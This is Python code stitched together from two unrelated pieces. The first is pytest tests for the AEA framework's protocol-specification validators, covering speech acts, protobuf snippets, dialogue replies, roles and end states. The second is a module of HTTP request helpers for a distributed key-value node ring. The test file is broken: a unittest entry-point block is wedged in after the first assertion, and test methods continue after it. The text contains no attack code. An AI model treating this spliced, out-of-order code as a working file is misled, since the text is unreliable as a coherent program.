        assert invalid_msg_1 == "Some error on dialogue section."
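# A minimal convenience entry point (an illustrative addition, not part of the
# original test suite): it lets this module be executed directly with the
# standard-library unittest runner as an alternative to invoking pytest.
if __name__ == "__main__":
    import unittest

    unittest.main()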
performative ) ) ################################################### invalid_content_type_1 = "ct:data" invalid_result_1, invalid_msg_1 = _validate_content_type( invalid_content_type_1, content_name, performative ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_2 = "bool" invalid_result_2, invalid_msg_2 = _validate_content_type( invalid_content_type_2, content_name, performative ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_3 = "pt: set[pt:int]" invalid_result_3, invalid_msg_3 = _validate_content_type( invalid_content_type_3, content_name, performative ) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_4 = "pt:list[string]" invalid_result_4, invalid_msg_4 = _validate_content_type( invalid_content_type_4, content_name, performative ) assert invalid_result_4 is False assert ( invalid_msg_4 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_5 = "pt:dict[pt:bool, pt:integer]" invalid_result_5, invalid_msg_5 = _validate_content_type( invalid_content_type_5, content_name, performative ) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_6 = "pt:union{pt:boolean, pt:int]" invalid_result_6, invalid_msg_6 = _validate_content_type( invalid_content_type_6, content_name, performative ) assert invalid_result_6 is False assert ( invalid_msg_6 == "Invalid type for content '{}' of performative '{}'. See documentation for the correct format of specification types.".format( content_name, performative, ) ) invalid_content_type_7 = "pt:optional[pt:str, pt:int, pt:list[pt:bool]]" invalid_result_7, invalid_msg_7 = _validate_content_type( invalid_content_type_7, content_name, performative ) assert invalid_result_7 is False assert ( invalid_msg_7 == "Invalid type for content '{}' of performative '{}'. 
See documentation for the correct format of specification types.".format( content_name, performative, ) ) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_speech_acts_section(self, mocked_spec): """Test for the '_validate_speech_acts_section' method.""" valid_speech_act_content_config_1 = SpeechActContentConfig( content_1="ct:CustomType", content_2="pt:int" ) valid_speech_act_content_config_2 = SpeechActContentConfig( content_3="ct:DataModel" ) valid_speech_act_content_config_3 = SpeechActContentConfig() speech_act_1 = CRUDCollection() speech_act_1.create("perm_1", valid_speech_act_content_config_1) speech_act_1.create("perm_2", valid_speech_act_content_config_2) speech_act_1.create("perm_3", valid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_1 ( valid_result_1, valid_msg_1, valid_all_per_1, valid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Speech-acts are valid." assert valid_all_per_1 == {"perm_1", "perm_2", "perm_3"} assert valid_all_content_1 == {"ct:CustomType", "ct:DataModel"} ################################################### speech_act_3 = CRUDCollection() invalid_perm = "_query_" speech_act_3.create(invalid_perm, valid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_3 ( invalid_result_1, invalid_msg_1, invalid_all_per_1, invalid_all_content_1, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for performative '{}'. Performative names must match the following regular expression: {} ".format( invalid_perm, PERFORMATIVE_REGEX_PATTERN ) ) assert invalid_all_per_1 is None assert invalid_all_content_1 is None invalid_speech_act_content_config_1 = SpeechActContentConfig(target="pt:int") speech_act_4 = CRUDCollection() valid_perm = "perm_1" speech_act_4.create(valid_perm, invalid_speech_act_content_config_1) mocked_spec.speech_acts = speech_act_4 ( invalid_result_2, invalid_msg_2, invalid_all_per_2, invalid_all_content_2, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for content '{}' of performative '{}'. This name is reserved.".format( "target", valid_perm, ) ) assert invalid_all_per_2 is None assert invalid_all_content_2 is None invalid_speech_act_content_config_2 = SpeechActContentConfig( content_name_1="pt: set[pt:int]" ) speech_act_5 = CRUDCollection() speech_act_5.create(valid_perm, invalid_speech_act_content_config_2) mocked_spec.speech_acts = speech_act_5 ( invalid_result_3, invalid_msg_3, invalid_all_per_3, invalid_all_content_3, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid type for content 'content_name_1' of performative '{}'. See documentation for the correct format of specification types.".format( valid_perm, ) ) assert invalid_all_per_3 is None assert invalid_all_content_3 is None speech_act_6 = CRUDCollection() mocked_spec.speech_acts = speech_act_6 ( invalid_result_4, invalid_msg_4, invalid_all_per_4, invalid_all_content_4, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_4 is False assert invalid_msg_4 == "Speech-acts cannot be empty!" 
assert invalid_all_per_4 is None assert invalid_all_content_4 is None invalid_speech_act_content_config_3 = SpeechActContentConfig(content_name_1=123) speech_act_7 = CRUDCollection() speech_act_7.create(valid_perm, invalid_speech_act_content_config_3) mocked_spec.speech_acts = speech_act_7 ( invalid_result_5, invalid_msg_5, invalid_all_per_5, invalid_all_content_5, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_5 is False assert ( invalid_msg_5 == f"Invalid type for '{'content_name_1'}'. Expected str. Found {type(123)}." ) assert invalid_all_per_5 is None assert invalid_all_content_5 is None invalid_speech_act_content_config_4 = SpeechActContentConfig( content_name_1="pt:int" ) invalid_speech_act_content_config_5 = SpeechActContentConfig( content_name_1="pt:float" ) speech_act_8 = CRUDCollection() speech_act_8.create("perm_1", invalid_speech_act_content_config_4) speech_act_8.create("perm_2", invalid_speech_act_content_config_5) mocked_spec.speech_acts = speech_act_8 ( invalid_result_6, invalid_msg_6, invalid_all_per_6, invalid_all_content_6, ) = _validate_speech_acts_section(mocked_spec) assert invalid_result_6 is False assert ( invalid_msg_6 == "Content 'content_name_1' with type 'pt:float' under performative 'perm_2' is already defined under performative 'perm_1' with a different type ('pt:int')." ) assert invalid_all_per_6 is None assert invalid_all_content_6 is None @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_protocol_buffer_schema_code_snippets(self, mocked_spec): """Test for the '_validate_protocol_buffer_schema_code_snippets' method.""" valid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;\nrepeated int32 set_field = 6;\nrepeated string list_field = 7;\nmap<int32, bool> dict_field = 8;\n" } valid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = valid_protobuf_snippet_1 valid_result_1, valid_msg_1, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_1 ) assert valid_result_1 is True assert valid_msg_1 == "Protobuf code snippet section is valid." valid_protobuf_snippet_2 = {} valid_all_content_2 = set() mocked_spec.protobuf_snippets = valid_protobuf_snippet_2 valid_result_2, valid_msg_2, = _validate_protocol_buffer_schema_code_snippets( mocked_spec, valid_all_content_2 ) assert valid_result_2 is True assert valid_msg_2 == "Protobuf code snippet section is valid." ################################################### invalid_protobuf_snippet_1 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;\nbool bool_field = 4;\nstring str_field = 5;", "ct:Query": "bytes bytes_field = 1;", } invalid_all_content_1 = {"ct:DataModel"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_1 ( invalid_result_1, invalid_msg_1, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == "Extra protobuf code snippet provided. Type 'ct:Query' is not used anywhere in your protocol definition." 
) invalid_protobuf_snippet_2 = { "ct:DataModel": "bytes bytes_field = 1;\nint32 int_field = 2;\nfloat float_field = 3;", } invalid_all_content_2 = {"ct:DataModel", "ct:Frame"} mocked_spec.protobuf_snippets = invalid_protobuf_snippet_2 ( invalid_result_2, invalid_msg_2, ) = _validate_protocol_buffer_schema_code_snippets( mocked_spec, invalid_all_content_2 ) assert invalid_result_2 is False assert ( invalid_msg_2 == "No protobuf code snippet is provided for the following custom types: {}".format( {"ct:Frame"}, ) ) def test_validate_field_existence(self): """Test for the '_validate_field_existence' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": [ "performative_mt", "performative_o", "performative_empty_contents", ], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } ( valid_result_1, valid_msg_1, ) = _validate_field_existence(valid_dialogue_config_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section has all the required fields." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1.pop("initiation") ( invalid_result_1, invalid_msg_1, ) = _validate_field_existence(invalid_dialogue_config_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Missing required field 'initiation' in the dialogue section of the protocol specification." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2.pop("reply") ( invalid_result_2, invalid_msg_2, ) = _validate_field_existence(invalid_dialogue_config_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Missing required field 'reply' in the dialogue section of the protocol specification." ) def test_validate_initiation(self): """Test for the '_validate_initiation' method.""" valid_initiation_1 = ["perm_1", "perm_2"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_result_1, valid_msg_1 = _validate_initiation( valid_initiation_1, valid_performatives_set ) assert valid_result_1 is True assert valid_msg_1 == "Initial messages are valid." ################################################### invalid_initiation_1 = [] invalid_result_1, invalid_msg_1 = _validate_initiation( invalid_initiation_1, valid_performatives_set ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one initial performative for this dialogue must be specified." ) invalid_initiation_2 = ["perm_5"] invalid_result_2, invalid_msg_2 = _validate_initiation( invalid_initiation_2, valid_performatives_set ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_initiation_3 = "perm_1" invalid_result_3, invalid_msg_3 = _validate_initiation( invalid_initiation_3, valid_performatives_set ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for initiation. Expected list. Found '{type(invalid_initiation_3)}'." 
) def test_validate_reply(self): """Test for the '_validate_reply' method.""" valid_reply_1 = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } ( valid_result_1, valid_msg_1, terminal_performatives_from_reply_1, ) = _validate_reply(valid_reply_1, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Reply structure is valid." assert terminal_performatives_from_reply_1 == { "performative_mt", "performative_o", } ################################################### invalid_reply_1 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": [], } invalid_performatives_set_1 = {"perm_1", "perm_2", "perm_3", "perm_4", "perm_5"} ( invalid_result_1, invalid_msg_1, invalid_terminal_performatives_from_reply_1, ) = _validate_reply(invalid_reply_1, invalid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "No reply is provided for the following performatives: {}".format( {"perm_5"}, ) ) assert invalid_terminal_performatives_from_reply_1 is None invalid_reply_2 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_5"], "perm_5": [], } invalid_performatives_set_2 = {"perm_1", "perm_2", "perm_3", "perm_4"} ( invalid_result_2, invalid_msg_2, invalid_terminal_performatives_from_reply_2, ) = _validate_reply(invalid_reply_2, invalid_performatives_set_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' in the list of replies for 'perm_4' is not defined in speech-acts." ) assert invalid_terminal_performatives_from_reply_2 is None invalid_reply_3 = ["perm_1", "perm_2", "perm_3", "perm_4", "perm_5"] ( invalid_result_3, invalid_msg_3, invalid_terminal_performatives_from_reply_3, ) = _validate_reply(invalid_reply_3, invalid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for the reply definition. Expected dict. Found '{type(invalid_reply_3)}'." ) assert invalid_terminal_performatives_from_reply_3 is None invalid_reply_4 = { "perm_1": {"perm_2"}, "perm_2": {"perm_3"}, "perm_3": {"perm_4"}, "perm_4": {"perm_5"}, "perm_5": set(), } ( invalid_result_4, invalid_msg_4, invalid_terminal_performatives_from_reply_4, ) = _validate_reply(invalid_reply_4, invalid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for replies of performative perm_1. Expected list. Found '{type({'perm_2'})}'." ) assert invalid_terminal_performatives_from_reply_4 is None invalid_reply_5 = { "perm_1": ["perm_2"], "perm_2": ["perm_3"], "perm_3": ["perm_4"], "perm_4": ["perm_1"], "perm_5": [], } ( invalid_result_5, invalid_msg_5, invalid_terminal_performatives_from_reply_5, ) = _validate_reply(invalid_reply_5, invalid_performatives_set_2) assert invalid_result_5 is False assert ( invalid_msg_5 == "Performative 'perm_5' specified in \"reply\" is not defined in the protocol's speech-acts." 
) assert invalid_terminal_performatives_from_reply_5 is None def test_validate_termination(self): """Test for the '_validate_termination' method.""" valid_termination_1 = ["perm_4", "perm_3"] valid_performatives_set = {"perm_1", "perm_2", "perm_3", "perm_4"} valid_terminal_performatives_from_reply_1 = {"perm_4", "perm_3"} valid_result_1, valid_msg_1 = _validate_termination( valid_termination_1, valid_performatives_set, valid_terminal_performatives_from_reply_1, ) assert valid_result_1 is True assert valid_msg_1 == "Terminal messages are valid." ################################################### invalid_termination_1 = [] invalid_terminal_performatives_from_reply_1 = set() invalid_result_1, invalid_msg_1 = _validate_termination( invalid_termination_1, valid_performatives_set, invalid_terminal_performatives_from_reply_1, ) assert invalid_result_1 is False assert ( invalid_msg_1 == "At least one terminal performative for this dialogue must be specified." ) invalid_termination_2 = ["perm_5"] invalid_terminal_performatives_from_reply_2 = {"perm_5"} invalid_result_2, invalid_msg_2 = _validate_termination( invalid_termination_2, valid_performatives_set, invalid_terminal_performatives_from_reply_2, ) assert invalid_result_2 is False assert ( invalid_msg_2 == "Performative 'perm_5' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_termination_3 = {"perm_5"} invalid_terminal_performatives_from_reply_3 = {"perm_5"} invalid_result_3, invalid_msg_3 = _validate_termination( invalid_termination_3, valid_performatives_set, invalid_terminal_performatives_from_reply_3, ) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for termination. Expected list. Found '{type(invalid_termination_3)}'." ) invalid_termination_4 = ["perm_4", "perm_3", "perm_4", "perm_3", "perm_1"] invalid_terminal_performatives_from_reply_4 = {"perm_4", "perm_3", "perm_1"} invalid_result_4, invalid_msg_4 = _validate_termination( invalid_termination_4, valid_performatives_set, invalid_terminal_performatives_from_reply_4, ) assert invalid_result_4 is False assert ( invalid_msg_4 == f'There are {2} duplicate performatives in "termination".' ) invalid_termination_5 = ["perm_4", "perm_3"] invalid_terminal_performatives_from_reply_5 = {"perm_4"} invalid_result_5, invalid_msg_5 = _validate_termination( invalid_termination_5, valid_performatives_set, invalid_terminal_performatives_from_reply_5, ) assert invalid_result_5 is False assert ( invalid_msg_5 == 'The terminal performative \'perm_3\' specified in "termination" is assigned replies in "reply".' ) invalid_termination_6 = ["perm_4"] invalid_terminal_performatives_from_reply_6 = {"perm_4", "perm_3"} invalid_result_6, invalid_msg_6 = _validate_termination( invalid_termination_6, valid_performatives_set, invalid_terminal_performatives_from_reply_6, ) assert invalid_result_6 is False assert ( invalid_msg_6 == "The performative 'perm_3' has no replies but is not listed as a terminal performative in \"termination\"." ) def test_validate_roles(self): """Test for the '_validate_roles' method.""" valid_roles_1 = {"role_1": None, "role_2": None} valid_result_1, valid_msg_1 = _validate_roles(valid_roles_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue roles are valid." valid_roles_2 = {"role_1": None} valid_result_2, valid_msg_2 = _validate_roles(valid_roles_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue roles are valid." 
################################################### invalid_roles_1 = dict() invalid_result_1, invalid_msg_1 = _validate_roles(invalid_roles_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "There must be either 1 or 2 roles defined in this dialogue. Found 0" ) invalid_roles_2 = {"role_1": None, "role_2": None, "role_3": None} invalid_result_2, invalid_msg_2 = _validate_roles(invalid_roles_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "There must be either 1 or 2 roles defined in this dialogue. Found 3" ) invalid_roles_3 = {"_agent_": None} invalid_result_3, invalid_msg_3 = _validate_roles(invalid_roles_3) assert invalid_result_3 is False assert ( invalid_msg_3 == "Invalid name for role '_agent_'. Role names must match the following regular expression: {} ".format( ROLE_REGEX_PATTERN ) ) invalid_roles_4 = {"client"} invalid_result_4, invalid_msg_4 = _validate_roles(invalid_roles_4) assert invalid_result_4 is False assert ( invalid_msg_4 == f"Invalid type for roles. Expected dict. Found '{type(invalid_roles_4)}'." ) def test_validate_end_states(self): """Test for the '_validate_end_states' method.""" valid_end_states_1 = ["end_state_1", "end_state_2"] valid_result_1, valid_msg_1 = _validate_end_states(valid_end_states_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue end_states are valid." valid_end_states_2 = [] valid_result_2, valid_msg_2 = _validate_end_states(valid_end_states_2) assert valid_result_2 is True assert valid_msg_2 == "Dialogue end_states are valid." ################################################### invalid_end_states_1 = ["_end_state_1"] invalid_result_1, invalid_msg_1 = _validate_end_states(invalid_end_states_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Invalid name for end_state '_end_state_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_2 = ["end_$tate_1"] invalid_result_2, invalid_msg_2 = _validate_end_states(invalid_end_states_2) assert invalid_result_2 is False assert ( invalid_msg_2 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_end_states_3 = {"end_state_1"} invalid_result_3, invalid_msg_3 = _validate_end_states(invalid_end_states_3) assert invalid_result_3 is False assert ( invalid_msg_3 == f"Invalid type for roles. Expected list. Found '{type(invalid_end_states_3)}'." ) def test_validate_keep_terminal(self): """Test for the '_validate_keep_terminal' method.""" valid_keep_terminal_state_dialogues_1 = True valid_result_1, valid_msg_1 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_1 ) assert valid_result_1 is True assert valid_msg_1 == "Dialogue keep_terminal_state_dialogues is valid." valid_keep_terminal_state_dialogues_2 = False valid_result_2, valid_msg_2 = _validate_keep_terminal( valid_keep_terminal_state_dialogues_2 ) assert valid_result_2 is True assert valid_msg_2 == "Dialogue keep_terminal_state_dialogues is valid." ################################################### invalid_keep_terminal_state_dialogues_1 = "some_non_boolean_value" invalid_result_1, invalid_msg_1 = _validate_keep_terminal( invalid_keep_terminal_state_dialogues_1 ) assert invalid_result_1 is False assert ( invalid_msg_1 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_keep_terminal_state_dialogues_1)}." 
) @mock.patch( "aea.configurations.base.ProtocolSpecification", ) def test_validate_dialogue_section(self, mocked_spec): """Test for the '_validate_dialogue_section' method.""" valid_dialogue_config_1 = { "initiation": ["performative_ct", "performative_pt"], "reply": { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], "performative_empty_contents": ["performative_empty_contents"], }, "termination": ["performative_mt", "performative_o"], "roles": {"role_1": None, "role_2": None}, "end_states": ["end_state_1", "end_state_2", "end_state_3"], "keep_terminal_state_dialogues": True, } valid_performatives_set_1 = { "performative_ct", "performative_pt", "performative_pct", "performative_pmt", "performative_mt", "performative_o", "performative_empty_contents", } mocked_spec.dialogue_config = valid_dialogue_config_1 ( valid_result_1, valid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert valid_result_1 is True assert valid_msg_1 == "Dialogue section of the protocol specification is valid." ################################################### invalid_dialogue_config_1 = valid_dialogue_config_1.copy() invalid_dialogue_config_1["initiation"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_1 ( invalid_result_1, invalid_msg_1, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_1 is False assert ( invalid_msg_1 == "Performative 'new_performative' specified in \"initiation\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_2 = valid_dialogue_config_1.copy() invalid_dialogue_config_2["reply"] = { "performative_ct": ["performative_pct"], "performative_pt": ["performative_pmt"], "performative_pct": ["performative_mt", "performative_o"], "performative_pmt": ["performative_mt", "performative_o"], "performative_mt": [], "performative_o": [], } mocked_spec.dialogue_config = invalid_dialogue_config_2 ( invalid_result_2, invalid_msg_2, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_2 is False assert ( invalid_msg_2 == "No reply is provided for the following performatives: {}".format( {"performative_empty_contents"}, ) ) invalid_dialogue_config_3 = valid_dialogue_config_1.copy() invalid_dialogue_config_3["termination"] = ["new_performative"] mocked_spec.dialogue_config = invalid_dialogue_config_3 ( invalid_result_3, invalid_msg_3, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_3 is False assert ( invalid_msg_3 == "Performative 'new_performative' specified in \"termination\" is not defined in the protocol's speech-acts." ) invalid_dialogue_config_4 = valid_dialogue_config_1.copy() invalid_dialogue_config_4["roles"] = { "role_1": None, "role_2": None, "role_3": None, } mocked_spec.dialogue_config = invalid_dialogue_config_4 ( invalid_result_4, invalid_msg_4, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_4 is False assert ( invalid_msg_4 == "There must be either 1 or 2 roles defined in this dialogue. 
Found 3" ) invalid_dialogue_config_5 = valid_dialogue_config_1.copy() invalid_dialogue_config_5["end_states"] = ["end_$tate_1"] mocked_spec.dialogue_config = invalid_dialogue_config_5 ( invalid_result_5, invalid_msg_5, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_5 is False assert ( invalid_msg_5 == "Invalid name for end_state 'end_$tate_1'. End_state names must match the following regular expression: {} ".format( END_STATE_REGEX_PATTERN ) ) invalid_dialogue_config_6 = valid_dialogue_config_1.copy() invalid_dialogue_config_6.pop("termination") mocked_spec.dialogue_config = invalid_dialogue_config_6 ( invalid_result_6, invalid_msg_6, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_6 is False assert ( invalid_msg_6 == "Missing required field 'termination' in the dialogue section of the protocol specification." ) invalid_value = 521 invalid_dialogue_config_7 = valid_dialogue_config_1.copy() invalid_dialogue_config_7["keep_terminal_state_dialogues"] = invalid_value mocked_spec.dialogue_config = invalid_dialogue_config_7 ( invalid_result_7, invalid_msg_7, ) = _validate_dialogue_section(mocked_spec, valid_performatives_set_1) assert invalid_result_7 is False assert ( invalid_msg_7 == f"Invalid type for keep_terminal_state_dialogues. Expected bool. Found {type(invalid_value)}." ) @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([True, "Dialogue section is correct!"]), ) def test_validate_positive( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Positive test for the 'validate' method: invalid dialogue section.""" ( valid_result_1, valid_msg_1, ) = validate(mocked_spec) assert valid_result_1 is True assert valid_msg_1 == "Protocol specification is valid." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([False, "Some error on speech_acts.", None, None]), ) def test_validate_negative_invalid_speech_acts( self, mocked_spec, macked_validate_speech_acts ): """Negative test for the 'validate' method: invalid speech_acts.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on speech_acts." @mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([False, "Some error on protobuf snippets."]), ) def test_validate_negative_invalid_protobuf_snippets( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf ): """Negative test for the 'validate' method: invalid protobuf snippets.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on protobuf snippets." 
@mock.patch("aea.configurations.base.ProtocolSpecification") @mock.patch( "aea.protocols.generator.validate._validate_speech_acts_section", return_value=tuple([True, "Speech_acts are correct!", set(), set()]), ) @mock.patch( "aea.protocols.generator.validate._validate_protocol_buffer_schema_code_snippets", return_value=tuple([True, "Protobuf snippets are correct!"]), ) @mock.patch( "aea.protocols.generator.validate._validate_dialogue_section", return_value=tuple([False, "Some error on dialogue section."]), ) def test_validate_negative_invalid_dialogue_section( self, mocked_spec, macked_validate_speech_acts, macked_validate_protobuf, macked_validate_dialogue, ): """Negative test for the 'validate' method: invalid dialogue section.""" ( invalid_result_1, invalid_msg_1, ) = validate(mocked_spec) assert invalid_result_1 is False assert invalid_msg_1 == "Some error on dialogue section."
import requests from time import sleep from lib.constants import * def log_request(targetNode): url = HTTP + targetNode.get_address() + '/log' return requests.get(url) def join_request(targetNode, port, ip): sleep(2) url = HTTP + targetNode.get_address() + '/join' params = f'{PORT}={port}&{IP}={ip}' requests.get(url + '?' + params) def insert_request(targetNode, key, value, propagate = True): url = HTTP + targetNode.get_address() + '/insert' params = f'{KEY}={key}&{VALUE}={value}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def insert_replica_request(targetNode, key, value, number, propagate = True): url = HTTP + targetNode.get_address() + '/insert_replica' params = f'{KEY}={key}&{VALUE}={value}&{NUMBER}={number}' if not propagate: params += f'&{PROPAGATE_REPLICAS}=false' requests.get(url + '?' + params) def increase_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/increase_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def decrease_replicas_in_range_request(targetNode, number): url = HTTP + targetNode.get_address() + '/decrease_replicas_in_range' params = f'{NUMBER}={number}' requests.get(url + '?' + params) def increase_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/increase_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def delete_request(targetNode, key): url = HTTP + targetNode.get_address() + '/delete' params = f'{KEY}={key}' requests.get(url + '?' + params) def delete_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/delete_replica' params = f'{KEY}={key}&{NUMBER}={number}' requests.get(url + '?' + params) def query_request(targetNode, key): url = HTTP + targetNode.get_address() + '/query' params = f'{KEY}={key}' result = requests.get(url + '?' + params) return result def query_replica_request(targetNode, key, number): url = HTTP + targetNode.get_address() + '/query_replica' params = f'{KEY}={key}&{NUMBER}={number}' result = requests.get(url + '?' + params) return result def update_next_request(targetNode, port, ip, cur_next): url = HTTP + targetNode.get_address() + '/update_next' params = f'{PORT}={port}&{IP}={ip}&{CUR_NEXT}={cur_next}' requests.get(url + '?' + params) def get_all_files_request(targetNode): url = HTTP + targetNode.get_address() + '/get_all_files' result = requests.get(url) return result def update_prev_request(targetNode, port, ip, cur_prev): url = HTTP + targetNode.get_address() + '/update_prev' params = { PORT: port, IP: ip, CUR_PREV: cur_prev, } requests.get(url, params=params) def join_successful_request(target, previous, next): url = HTTP + target.get_address() + '/join_successful' params = f'{NEXT_PORT}={next.get_port()}&{NEXT_IP}={next.get_ip()}' +\ f'&{PREV_PORT}={previous.get_port()}&{PREV_IP}={previous.get_ip()}' print(f'Requesting page {url + "?" + params}') requests.get(url + '?' + params)
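# --- Hedged usage sketch for the request helpers above -----------------------
# 'MiniNode' is a hypothetical stand-in for whatever node type the rest of the
# codebase passes in; the only interface the helpers rely on is get_address()
# returning a 'host:port' string. Note that most helpers build query strings by
# hand, so keys and values are not URL-encoded; the params-dict style already
# used by update_prev_request is the safer equivalent, e.g.:
#
#     requests.get(HTTP + node.get_address() + '/insert',
#                  params={KEY: 'song.mp3', VALUE: '42'})
#
class MiniNode:
    def __init__(self, ip, port):
        self.ip = ip
        self.port = port

    def get_address(self):
        return f'{self.ip}:{self.port}'


if __name__ == '__main__':
    node = MiniNode('127.0.0.1', 5000)            # assumes a node is listening here
    insert_request(node, 'song.mp3', '42')        # store a key/value pair
    print(query_request(node, 'song.mp3').text)   # read it back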
